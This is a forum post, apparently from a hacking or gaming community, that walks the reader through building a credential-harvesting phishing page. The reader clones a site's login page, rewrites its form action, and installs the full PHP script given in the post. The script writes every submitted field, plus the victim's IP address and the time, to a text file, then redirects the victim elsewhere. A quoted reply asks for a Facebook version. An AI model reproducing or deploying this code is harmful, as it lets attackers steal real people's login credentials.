1. Go to the site you want to make a logger of and copy the source code, (right click, view page source.)
2. Paste it into a program you usually use to edit code. And save it as index.htm
Find the form "method" & "action" (Ctr+F) after the "=" put the command, "next.php". e.g.
<form method="get" action="next.php"
Save that, then paste this into the editing program (notepad)
<?php
$datum = date('d-m-Y / H:i:s'
;
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: https://www.nextgenupdate.com/forums");
$handle = fopen("holiday.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)
");
fwrite($handle, "
");
fclose($handle);
setcookie ("user", "empty", time()+3600);
exit;
?>
And replace the nextgenupdate link with what you want to redirect them to! :y:
Then save that as "next.php"
Upload them to your hosting, then when people go to login, their details will be stored to a .txt file called holiday.txt =D
---------- Post added at 03:30 PM ---------- Previous post was at 03:29 PM ----------
Forgot to quote! :embarrassed:
Originally posted by Script
Just got a facebook one someone direct where i learn how to make it from step 1 ?cheers